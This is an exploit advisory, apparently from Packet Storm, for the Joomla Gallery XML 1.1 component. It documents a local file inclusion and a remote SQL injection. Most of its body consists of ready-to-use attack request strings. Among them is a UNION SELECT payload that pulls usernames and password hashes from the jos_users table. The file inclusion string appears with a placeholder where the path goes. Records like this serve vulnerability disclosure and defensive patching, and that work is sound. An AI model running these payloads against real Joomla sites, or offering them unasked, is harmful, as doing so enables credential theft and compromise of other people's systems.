The Joomla Gallery XML component version 1.1 suffers from local file inclusion and remote SQL injection vulnerabilities.
b9f4d6d3712c3a42d3e8b66ab054c88470c11d3d47ac5d4ec9103156d86cf816
# Exploit Title: Joomla Component Gallery XML 1.1 Multiple Vulnerabilities
# Date: 18 May 2010
# Author: jdc
# Software Link:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
# Version: 1.1
# Tested on: PHP5, MySQL5
Local File Include
------------------
?option=com_galleryxml&controller=[LFI]&task=catpics&gcatid=1
SQL Injection
-------------
?option=com_galleryxml&controller=galpic&task=catpics&gcatid=-1 union
select 1,2,3,4,5,6,concat(username,char(32),password),8,9,10,11,12 from
jos_users -- '
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed